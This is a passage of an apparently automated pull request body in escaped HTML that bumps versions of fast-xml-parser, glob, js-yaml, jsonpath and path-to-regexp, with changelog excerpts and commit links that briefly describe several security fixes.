maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\n\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCJS typing fix\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUnexport \u003ccode\u003eX2jOptions\u003c/code\u003e at declaration site by \u003ca href=\"https://github.com/Drarig29\"\u003e\u003ccode\u003e@​Drarig29\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/pull/787\"\u003eNaturalIntelligence/fast-xml-parser#787\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Drarig29\"\u003e\u003ccode\u003e@​Drarig29\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/pull/787\"\u003eNaturalIntelligence/fast-xml-parser#787\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003efast-xml-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003eNote: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003cp\u003eNote: Due to some last quick changes on v4, detail of v4.5.3 \u0026amp; v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.6 / 2026-03-16\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate builder dependency\u003c/li\u003e\n\u003cli\u003efix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003efix check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.5 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esanitize dangerous tag or attribute name\u003c/li\u003e\n\u003cli\u003eerror on critical property name\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.4 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeclare Matcher \u0026amp; Expression as unknown so user is not forced to install path-expression-matcher\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.3 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.2 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate dependency to fix typings\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.1 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix dependency\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.0 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.2 / 2026-03-03\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxEntityCount option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.1  / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix (\u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/issues/785\"\u003e#785\u003c/a\u003e) unpairedTag node should not have tag content\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.0  / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emigrate to fast-xml-builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.9 / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport strictReservedNames\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.8 / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.7 / 2026-02-20\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/870043e75e78545192bc70950c6286d36c7cdf23\"\u003e\u003ccode\u003e870043e\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/6df401ef2bb1d152313276add24cdfa860819751\"\u003e\u003ccode\u003e6df401e\u003c/code\u003e\u003c/a\u003e update builder dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01\"\u003e\u003ccode\u003ebd26122\u003c/code\u003e\u003c/a\u003e check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/7e70dd8f758f3f494c4e14a281cea35b7d8d0d13\"\u003e\u003ccode\u003e7e70dd8\u003c/code\u003e\u003c/a\u003e fix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/e54155f53048e9d58e27f170d3ccff15176b6671\"\u003e\u003ccode\u003ee54155f\u003c/code\u003e\u003c/a\u003e update package info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/3308fd7a45d9d74e87c6b6c4ef0574abaa1f8b65\"\u003e\u003ccode\u003e3308fd7\u003c/code\u003e\u003c/a\u003e handle critical properties\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0500f6b4d66464fa70ecb58907804962c6b847f9\"\u003e\u003ccode\u003e0500f6b\u003c/code\u003e\u003c/a\u003e refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/ea07bb2e8435a88136c0e46d7ee8a345107b7582\"\u003e\u003ccode\u003eea07bb2\u003c/code\u003e\u003c/a\u003e declare Matcher \u0026amp; Expression as unknown\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0a4dc92f979b5b03cfac2339ec7d81385edc14a8\"\u003e\u003ccode\u003e0a4dc92\u003c/code\u003e\u003c/a\u003e upgrade builder\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/e0a14f7d15a293732e630ce1b7faa39924de2359\"\u003e\u003ccode\u003ee0a14f7\u003c/code\u003e\u003c/a\u003e update dependency to fix typings\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v5.5.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca 